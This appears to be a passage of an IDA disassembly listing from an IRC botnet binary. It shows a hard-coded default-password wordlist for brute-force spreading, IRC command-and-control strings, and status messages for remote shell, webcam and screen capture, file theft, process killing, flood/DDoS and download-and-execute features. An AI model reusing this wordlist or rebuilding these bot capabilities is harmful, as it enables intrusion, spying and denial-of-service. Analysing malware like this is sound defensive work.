aCompaq db 'compaq',0 ; DATA XREF: seg002:0043C45C�o
align 10h
aDell db 'dell',0 ; DATA XREF: seg002:0043C458�o
align 4
aCisco_0 db 'cisco',0 ; DATA XREF: seg000:0040C81B�o
; seg002:0043C454�o
align 10h
aIbm db 'ibm',0 ; DATA XREF: seg002:0043C450�o
aOrainstall db 'orainstall',0 ; DATA XREF: seg002:0043C448�o
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: seg002:0043C444�o
align 4
aSql db 'sql',0 ; DATA XREF: seg002:0043C440�o
aSa db 'sa',0 ; DATA XREF: sub_40274D+1A13�o
; seg002:0043C43C�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: seg002:0043C438�o
align 4
aDb1 db 'db1',0 ; DATA XREF: seg002:0043C430�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: seg002:0043C42C�o
align 4
aData db 'data',0 ; DATA XREF: seg002:0043C428�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: seg002:0043C424�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: seg002:0043C420�o
align 10h
aDbpass db 'dbpass',0 ; DATA XREF: seg002:0043C41C�o
align 4
aAccess db 'access',0 ; DATA XREF: seg002:0043C418�o
align 10h
aDomainpassword db 'domainpassword',0 ; DATA XREF: seg002:0043C410�o
align 10h
aDomainpass db 'domainpass',0 ; DATA XREF: seg002:0043C40C�o
align 4
aDomain db 'domain',0 ; DATA XREF: seg002:0043C408�o
align 4
aHello db 'hello',0 ; DATA XREF: seg002:0043C404�o
align 4
aHell db 'hell',0 ; DATA XREF: seg002:0043C400�o
align 4
aGod db 'god',0 ; DATA XREF: seg002:0043C3FC�o
aSex db 'sex',0 ; DATA XREF: seg002:0043C3F8�o
; seg002:off_4431D8�o
aSlut db 'slut',0 ; DATA XREF: seg002:0043C3F4�o
align 4
aBitch db 'bitch',0 ; DATA XREF: seg002:0043C3F0�o
align 4
aFuck db 'fuck',0 ; DATA XREF: seg002:0043C3EC�o
align 4
aExchange db 'exchange',0 ; DATA XREF: seg002:0043C3E8�o
align 10h
aBackup db 'backup',0 ; DATA XREF: seg002:0043C3E4�o
align 4
aTechnical db 'technical',0 ; DATA XREF: seg002:0043C3E0�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: seg002:0043C3DC�o
align 10h
aLogin db 'login',0 ; DATA XREF: sub_40274D+9B8�o
; seg002:0043C3D8�o
align 4
aMary db 'mary',0 ; DATA XREF: seg002:0043C3D4�o
align 10h
aKatie db 'katie',0 ; DATA XREF: seg002:0043C3D0�o
align 4
aKate db 'kate',0 ; DATA XREF: seg002:0043C3C8�o
align 10h
aGeorge db 'george',0 ; DATA XREF: seg002:0043C3C4�o
align 4
aEric db 'eric',0 ; DATA XREF: seg002:0043C3C0�o
align 10h
aChris db 'chris',0 ; DATA XREF: seg002:0043C3BC�o
align 4
aIan db 'ian',0 ; DATA XREF: seg002:0043C3B8�o
aNeil db 'neil',0 ; DATA XREF: seg002:0043C3B4�o
align 4
aLee db 'lee',0 ; DATA XREF: seg002:0043C3B0�o
aBrian db 'brian',0 ; DATA XREF: seg002:0043C3AC�o
align 10h
aSusan db 'susan',0 ; DATA XREF: seg002:0043C3A4�o
align 4
aSue db 'sue',0 ; DATA XREF: seg002:0043C3A0�o
aSam db 'sam',0 ; DATA XREF: seg002:0043C39C�o
aLuke db 'luke',0 ; DATA XREF: seg002:0043C398�o
align 4
aPeter db 'peter',0 ; DATA XREF: seg002:0043C394�o
; seg002:0043C3A8�o
align 10h
aJohn db 'john',0 ; DATA XREF: seg002:0043C390�o
align 4
aMike db 'mike',0 ; DATA XREF: seg002:0043C38C�o
align 10h
aBill db 'bill',0 ; DATA XREF: seg002:0043C388�o
align 4
aFred db 'fred',0 ; DATA XREF: seg002:0043C384�o
align 10h
aJoe db 'joe',0 ; DATA XREF: seg002:0043C380�o
aJen db 'jen',0 ; DATA XREF: seg002:0043C37C�o
aBob db 'bob',0 ; DATA XREF: seg002:0043C378�o
; seg002:0043C3CC�o
aQwe db 'qwe',0 ; DATA XREF: seg002:0043C374�o
aZxc db 'zxc',0 ; DATA XREF: seg002:0043C370�o
aAsd db 'asd',0 ; DATA XREF: seg002:0043C36C�o
aQaz db 'qaz',0 ; DATA XREF: seg002:0043C368�o
aWin2000 db 'win2000',0 ; DATA XREF: seg002:0043C364�o
aWinnt db 'winnt',0 ; DATA XREF: seg002:0043C360�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: seg002:0043C35C�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: seg002:0043C358�o
align 4
aWin98 db 'win98',0 ; DATA XREF: seg002:0043C354�o
align 4
aWindows db 'windows',0 ; DATA XREF: seg002:0043C350�o
aOeminstall db 'oeminstall',0 ; DATA XREF: seg002:0043C34C�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: seg002:0043C348�o
aOem db 'oem',0 ; DATA XREF: seg002:0043C344�o
aUser_0 db 'user',0 ; DATA XREF: sub_40274D+4422�o
; seg002:0043C340�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: seg002:0043C33C�o
align 4
aHome db 'home',0 ; DATA XREF: seg002:0043C338�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: seg002:0043C334�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: seg002:0043C330�o
align 4
aInternet db 'internet',0 ; DATA XREF: seg002:0043C32C�o
; seg002:0043C488�o
align 4
aWww db 'www',0 ; DATA XREF: seg002:0043C328�o
aWeb db 'web',0 ; DATA XREF: seg002:0043C324�o
aOutlook db 'outlook',0 ; DATA XREF: seg002:0043C320�o
aMail db 'mail',0 ; DATA XREF: seg002:0043C31C�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: seg002:0043C318�o
align 4
aNull_1 db 'null',0 ; DATA XREF: seg002:0043C314�o
align 4
aServer_1 db 'server',0 ; DATA XREF: sub_40274D+3BA6�o
; seg002:0043C30C�o
align 4
aSystem db 'system',0 ; DATA XREF: seg002:0043C308�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: seg002:0043C300�o
align 4
aLinux db 'linux',0 ; DATA XREF: seg002:0043C2FC�o
align 10h
aUnix db 'unix',0 ; DATA XREF: seg002:0043C2F8�o
align 4
aDemo db 'demo',0 ; DATA XREF: seg002:0043C2F4�o
align 10h
aNone db 'none',0 ; DATA XREF: seg002:0043C2F0�o
align 4
aTest db 'test',0 ; DATA XREF: seg002:0043C2E8�o
align 10h
a2004 db '2004',0 ; DATA XREF: seg002:0043C2E4�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_41D779+98�o
; seg002:0043C2E0�o
align 10h
a2002 db '2002',0 ; DATA XREF: seg002:0043C2DC�o
align 4
a2001 db '2001',0 ; DATA XREF: seg002:0043C2D8�o
align 10h
a2000 db '2000',0 ; DATA XREF: seg002:0043C2D4�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: seg002:0043C2D0�o
align 4
a123456789 db '123456789',0 ; DATA XREF: seg002:0043C2CC�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: seg002:0043C2C8�o
align 4
a1234567 db '1234567',0 ; DATA XREF: seg002:0043C2C4�o
a123456 db '123456',0 ; DATA XREF: seg002:0043C2C0�o
align 4
a12345 db '12345',0 ; DATA XREF: seg002:0043C2BC�o
align 4
a1234 db '1234',0 ; DATA XREF: seg002:0043C2B8�o
align 4
a123 db '123',0 ; DATA XREF: seg002:0043C2B4�o
a12 db '12',0 ; DATA XREF: seg002:0043C2B0�o
align 4
a1: ; DATA XREF: seg002:0043C2AC�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: seg002:0043C2A8�o
aPwd db 'pwd',0 ; DATA XREF: seg002:0043C2A4�o
aPass_0 db 'pass',0 ; DATA XREF: seg002:0043C2A0�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: seg002:0043C29C�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: seg002:0043C298�o
align 4
aPassword db 'password',0 ; DATA XREF: seg002:0043C294�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: seg002:0043C290�o
align 4
aAdm db 'adm',0 ; DATA XREF: seg002:0043C28C�o
aDb2 db 'db2',0 ; DATA XREF: seg002:0043C268�o
; seg002:0043C434�o
aOracle db 'oracle',0 ; DATA XREF: seg002:0043C264�o
; seg002:0043C44C�o
align 4
aDba db 'dba',0 ; DATA XREF: seg002:0043C260�o
aDatabase db 'database',0 ; DATA XREF: seg002:0043C25C�o
; seg002:0043C414�o
align 4
aDefault db 'default',0 ; DATA XREF: seg002:0043C258�o
; seg002:0043C304�o
aGuest_0 db 'guest',0 ; DATA XREF: seg002:0043C254�o
; seg002:0043C2EC�o
align 4
aWwwadmin db 'wwwadmin',0 ; DATA XREF: seg002:0043C250�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: seg002:0043C24C�o
; seg002:0043C494�o
aStudent db 'student',0 ; DATA XREF: seg002:0043C248�o
; seg002:0043C490�o
aOwner db 'owner',0 ; DATA XREF: seg002:0043C244�o
align 4
aComputer db 'computer',0 ; DATA XREF: seg002:0043C240�o
align 4
aRoot db 'root',0 ; DATA XREF: seg002:0043C23C�o
; seg002:0043C310�o
align 4
aStaff db 'staff',0 ; DATA XREF: seg002:0043C238�o
; seg002:0043C498�o
align 4
aAdmin_0 db 'admin',0 ; DATA XREF: seg002:0043C234�o
; seg002:0043C288�o
align 4
aAdmins db 'admins',0 ; DATA XREF: seg002:0043C230�o
; seg002:0043C284�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: seg002:0043C22C�o
; seg002:0043C280�o
aAdministrateur db 'administrateur',0 ; DATA XREF: seg002:0043C228�o
; seg002:0043C27C�o
align 10h
aAdministrador db 'administrador',0 ; DATA XREF: seg002:0043C224�o
; seg002:0043C278�o
align 10h
aAdministrato_0 db 'administrator',0 ; DATA XREF: seg002:off_43C220�o
; seg002:0043C274�o
byte_42C60E db 0 ; DATA XREF: sub_40274D+3222�o
; sub_40274D+32F9�o ...
byte_42C60F db 0 ; DATA XREF: sub_40274D+35FB�o
; sub_40274D+3634�o ...
aMircV6_16Khale db 'mIRC v6.16 Khaled Mardam-Bey',0 ; DATA XREF: seg002:0043C174�o
align 10h
aMircV6_14Khale db 'mIRC v6.14 Khaled Mardam-Bey',0 ; DATA XREF: seg002:0043C170�o
align 10h
aMircV6_12Khale db 'mIRC v6.12 Khaled Mardam-Bey',0 ; DATA XREF: seg002:0043C16C�o
align 10h
aMircV6_10Khale db 'mIRC v6.10 Khaled Mardam-Bey',0 ; DATA XREF: seg002:off_43C168�o
align 10h
a@_0 db '*@*',0 ; DATA XREF: seg002:off_43C164�o
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_402472+61�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 10h
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_402472+37�o
align 4
unk_42C6BC db 2Dh ; - ; DATA XREF: sub_4025EF+B5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aConnectedToS_ db 'Connected to %s.',0
align 4
aModeSS_0 db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+7AE8�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+7AD3�o
align 4
unk_42C6FC db 2Dh ; - ; DATA XREF: sub_40274D+7ABF�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedIn_ db 'User: %s logged in.',0
unk_42C71C db 2Dh ; - ; DATA XREF: sub_40274D+7AA5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPasswordAccept db 'Password accepted.',0
align 4
unk_42C73C db 2Dh ; - ; DATA XREF: sub_40274D+7A50�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedHostAuth db '*Failed host auth by: (%s!%s).',0
align 4
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40274D+7A2D�o
align 10h
unk_42C790 db 2Dh ; - ; DATA XREF: sub_40274D+79E9�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedPassAuth db '*Failed pass auth by: (%s!%s).',0
align 4
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_40274D+79DA�o
; sub_40274D+7A41�o
align 4
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40274D+79C6�o
align 10h
asc_42C810: ; DATA XREF: sub_40274D+799C�o
unicode 0, <~>,0
dword_42C814 dd 0 ; DATA XREF: sub_40274D+7990�o
; sub_40E841+14�o
unk_42C818 db 2Dh ; - ; DATA XREF: sub_40274D+7957�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRandomNickChan db 'Random nick change: %s',0
align 4
unk_42C83C db 2Dh ; - ; DATA XREF: sub_40274D+78E6�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnectingIn db 'Reconnecting in %s seconds',0
align 4
unk_42C864 db 2Dh ; - ; DATA XREF: sub_40274D+78AC�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnecting_0 db 'Reconnecting in %s ms',0
align 4
unk_42C888 db 2Dh ; - ; DATA XREF: sub_40274D+7884�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNickChangedToS db 'Nick changed to: ',27h,'%s',27h,'.',0
align 4
unk_42C8AC db 2Dh ; - ; DATA XREF: sub_40274D+785F�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChannelS db 'Joined channel: ',27h,'%s',27h,'.',0
align 10h
unk_42C8D0 db 2Dh ; - ; DATA XREF: sub_40274D+7841�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPartedChannelS db 'Parted channel: ',27h,'%s',27h,'.',0
align 4
dword_42C8F4 dd 234032Dh, 6E69616Dh, 202D0302h, 20435249h, 3A776152h
; DATA XREF: sub_40274D+7827�o
dd 2E732520h, 0
unk_42C910 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409F01�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToKillTh db '- Failed to kill thread: %s.',0
align 4
unk_42C93C db 2Dh ; - ; DATA XREF: sub_40274D+77AD�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aKilledThreadS_ db '- Killed thread: %s.',0
align 10h
unk_42C960 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409EC6�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aNoActiveThread db '- No active threads found.',0
unk_42C988 db 2Dh ; - ; DATA XREF: sub_40274D+776F�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aStoppedDThread db '- Stopped: %d thread(s).',0
align 10h
aAll db 'all',0 ; DATA XREF: sub_40274D+7755�o
unk_42C9B4 db 2Dh ; - ; DATA XREF: sub_40274D+7625�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrefixChangedT db 'Prefix changed to: ',27h,'%c',27h,'.',0
align 4
unk_42C9DC db 2Dh ; - ; DATA XREF: sub_40274D:loc_409D59�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s',0
unk_42CA00 db 2Dh ; - ; DATA XREF: sub_40274D+7602�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFileOpenedS db ' File opened: %s',0
align 10h
unk_42CA20 db 2Dh ; - ; DATA XREF: sub_40274D+75D5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aServerChangedT db 'Server changed to: ',27h,'%s',27h,'.',0
align 4
unk_42CA48 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409D02�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aCouldnTResol_0 db '- Couldn',27h,'t resolve hostname.',0
align 10h
unk_42CA70 db 2Dh ; - ; DATA XREF: sub_40274D+758A�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS_ db '- Lookup: %s -> %s.',0
align 10h
unk_42CA90 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409C9A�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTermin db ' Failed to terminate process: %s',0
align 10h
unk_42CAC0 db 2Dh ; - ; DATA XREF: sub_40274D+7543�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledS db ' Process killed: %s',0
unk_42CAE0 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409C3F�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTerm_0 db ' Failed to terminate process ID: %s',0
unk_42CB10 db 2Dh ; - ; DATA XREF: sub_40274D+74EB�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledI db ' Process killed ID: %s',0
align 4
dword_42CB34 dd 234032Dh, 656C6966h, 202D0302h, 656C6544h, 20646574h
; DATA XREF: sub_40274D+74A0�o
dd 27732527h, 2Eh
unk_42CB50 db 2Dh ; - ; DATA XREF: sub_40274D+7423�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aSendFileSUserS db '- Send File: %s, User: %s.',0
dword_42CB74 dd 234032Dh, 656C6966h, 202D0302h, 7473694Ch, 7325203Ah
; DATA XREF: sub_40274D+73AF�o
dd 0
unk_42CB8C db 2Dh ; - ; DATA XREF: sub_40274D+736F�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToStartC db ' Failed to start connection thread, error: <%d>.',0
align 4
dword_42CBCC dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 7325203Ah
; DATA XREF: sub_40274D+7316�o
dd 2Eh
dword_42CBE4 dd 234032Dh, 6372696Dh, 202D0302h, 6D6D6F43h, 20646E61h
; DATA XREF: sub_40274D:loc_4099C3�o
dd 746E6573h, 2Eh
unk_42CC00 db 2Dh ; - ; DATA XREF: sub_40274D+726F�o
db 3, 34h, 2
db 6Dh ; m
db 69h, 72h, 63h
db 2
db 3, 2Dh, 20h
aClientNotOpen_ db 'Client not open.',0
align 10h
dword_42CC20 dd 234032Dh, 2646D63h, 43202D03h, 616D6D6Fh, 3A73646Eh
; DATA XREF: sub_40274D+7230�o
dd 732520h
unk_42CC38 db 2Dh ; - ; DATA XREF: sub_40274D+7228�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aErrorSendingTo db '- Error sending to remote shell.',0
align 4
asc_42CC64: ; DATA XREF: sub_40274D+720A�o
; sub_412135+29�o ...
dw 0Ah
unicode 0, <>,0
unk_42CC68 db 2Dh ; - ; DATA XREF: sub_40274D+71E0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileFailed db 'Read file failed: %s',0
align 4
unk_42CC8C db 2Dh ; - ; DATA XREF: sub_40274D+71CA�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileComple db 'Read file complete: %s',0
align 10h
unk_42CCB0 db 2Dh ; - ; DATA XREF: sub_40274D:loc_40989F�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_0 db '- Invalid parameters for amateur video capture.',0
align 10h
unk_42CCF0 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409895�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCapt db '- Error while capturing amateur video from webcam.',0
unk_42CD30 db 2Dh ; - ; DATA XREF: sub_40274D+7135�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aAmateurVideoSa db '- Amateur video saved to: %s.',0
align 4
aVideo db 'video',0 ; DATA XREF: sub_40274D:loc_4097FE�o
align 4
unk_42CD64 db 2Dh ; - ; DATA XREF: sub_40274D:loc_4097EB�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_1 db '- Invalid parameters for webcam capture.',0
align 4
unk_42CD9C db 2Dh ; - ; DATA XREF: sub_40274D:loc_4097E4�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_0 db '- Error while capturing from webcam.',0
align 10h
unk_42CDD0 db 2Dh ; - ; DATA XREF: sub_40274D+7087�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aWebcamCaptureS db '- Webcam capture saved to: %s.',0
aFrame db 'frame',0 ; DATA XREF: sub_40274D:loc_409770�o
align 4
unk_42CE04 db 2Dh ; - ; DATA XREF: sub_40274D+7016�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverListComp db '- Driver list complete.',0
align 4
unk_42CE2C db 2Dh ; - ; DATA XREF: sub_40274D+6FE6�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverDSS_ db '- Driver #%d - %s - %s.',0
align 4
aDrivers db 'drivers',0 ; DATA XREF: sub_40274D:loc_4096E6�o
unk_42CE5C db 2Dh ; - ; DATA XREF: sub_40274D:loc_4096D3�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aNoFilenameSpec db '- No filename specified for screen capture.',0
align 4
unk_42CE98 db 2Dh ; - ; DATA XREF: sub_40274D:loc_4096CC�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_1 db '- Error while capturing screen.',0
align 4
unk_42CEC8 db 2Dh ; - ; DATA XREF: sub_40274D+6F6F�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aScreenCaptureS db '- Screen capture saved to: %s.',0
aScreen db 'screen',0 ; DATA XREF: sub_40274D:loc_40968E�o
align 4
dword_42CEFC dd 234032Dh, 6E69616Dh, 202D0302h, 68746547h, 3A74736Fh
; DATA XREF: sub_40274D+6F29�o
dd 2E732520h, 0
unk_42CF18 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409636�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUnableToExtrac db 'Unable to extract Gethost command.',0
align 4
unk_42CF48 db 2Dh ; - ; DATA XREF: sub_40274D+6ED3�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aGethostSComman db 'Gethost: %s, Command: %s',0
align 10h
unk_42CF70 db 2Dh ; - ; DATA XREF: sub_40274D+6E3F�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aAliasAddedS_ db 'Alias added: %s.',0
align 10h
unk_42CF90 db 2Dh ; - ; DATA XREF: sub_40274D+6DFF�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrivmsgSS_ db 'Privmsg: %s: %s.',0
align 10h
unk_42CFB0 db 2Dh ; - ; DATA XREF: sub_40274D+6DA5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aActionSS_ db 'Action: %s: %s.',0
dword_42CFCC dd 234032Dh, 6E69616Dh, 202D0302h, 6C637943h, 2E65h
; DATA XREF: sub_40274D+6D36�o
aPartS_1 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+6CFF�o
; sub_40274D+7831�o
align 4
unk_42CFEC db 2Dh ; - ; DATA XREF: sub_40274D+6CDD�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aModeChangeS db 'Mode change: %s',0
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+6CCF�o
align 4
dword_42D014 dd 234032Dh, 6E6F6C63h, 2D030265h, 77615220h, 73252820h
; DATA XREF: sub_40274D+6CA4�o
dd 25203A29h, 73h
dword_42D030 dd 234032Dh, 6E6F6C63h, 2D030265h, 646F4D20h, 25282065h
; DATA XREF: sub_40274D+6C38�o
dd 203A2973h, 7325h
aModeS db 'MODE %s',0 ; DATA XREF: sub_40274D+6BE0�o
dword_42D054 dd 234032Dh, 6E6F6C63h, 2D030265h, 63694E20h, 2528206Bh
; DATA XREF: sub_40274D+6BB5�o
dd 203A2973h, 7325h
aS_0 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+6B96�o
; sub_40274D+6C19�o ...
align 4
aJoinSS_0 db 'JOIN %s %s',0 ; DATA XREF: sub_40274D+6B3F�o
align 4
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_40274D+6AFD�o
dword_42D08C dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_40274D+6AB3�o
aFailedToStartF db '- Failed to start flood thread, error: <%d>.',0
align 4
dword_42D0C8 dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_40274D+6A54�o
aFloodingSForSS db '- Flooding %s for %s seconds.',0
align 4
unk_42D0F4 db 2Dh ; - ; DATA XREF: sub_40274D+69E5�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aFailedToStar_0 db '- Failed to start flood thread, error: <%d>.',0
align 10h
unk_42D130 db 2Dh ; - ; DATA XREF: sub_40274D+6986�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aTsunamiHeading db '- Tsunami heading for %s (%s seconds).',0
unk_42D164 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409079�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRepeatNotAllow db 'Repeat not allowed in command line: %s',0
align 4
dword_42D198 dd 234032Dh, 6E69616Dh, 202D0302h, 65706552h, 203A7461h
; DATA XREF: sub_40274D+68F1�o
dd 7325h
dword_42D1B0 dd 234032Dh, 6E69616Dh, 202D0302h, 616C6544h, 2E79h
; DATA XREF: sub_40274D:loc_408FB6�o
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_40274D+6825�o
; sub_40274D+68CB�o ...
align 8
dword_42D1D8 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_40274D:loc_408F2F�o
aBotIdMustBeDif db '- Bot ID must be different than current running process.',0
align 10h
dword_42D220 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_40274D+67C3�o
aFailedToStartD db '- Failed to start download thread, error: <%d>.',0
dword_42D25C dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_40274D+676A�o
aDownloadingUpd db '- Downloading update from: %s.',0
align 4
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40274D+66CB�o
align 4
dword_42D294 dd 234032Dh, 63657865h, 202D0302h, 6D6D6F43h, 73646E61h
; DATA XREF: sub_40274D+666C�o
dd 7325203Ah, 0
unk_42D2B0 db 2Dh ; - ; DATA XREF: sub_40274D+6661�o
db 3, 34h, 2
db 65h ; e
db 78h, 65h, 63h
db 2
db 3, 2Dh, 20h
aCouldnTExecute db 'Couldn',27h,'t execute file.',0
align 4
unk_42D2D4 db 2Dh ; - ; DATA XREF: sub_40274D+65AF�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aFailedToStartS db 'Failed to start search thread, error: <%d>.',0
unk_42D310 db 2Dh ; - ; DATA XREF: sub_40274D+654B�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingForFi db 'Searching for file: %s in: %s.',0
align 10h
dword_42D340 dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_40274D:loc_408BFD�o
; sub_40274D:loc_409BF4�o
unk_42D34C db 2Dh ; - ; DATA XREF: sub_40274D+6498�o
db 3, 34h, 2
db 66h ; f
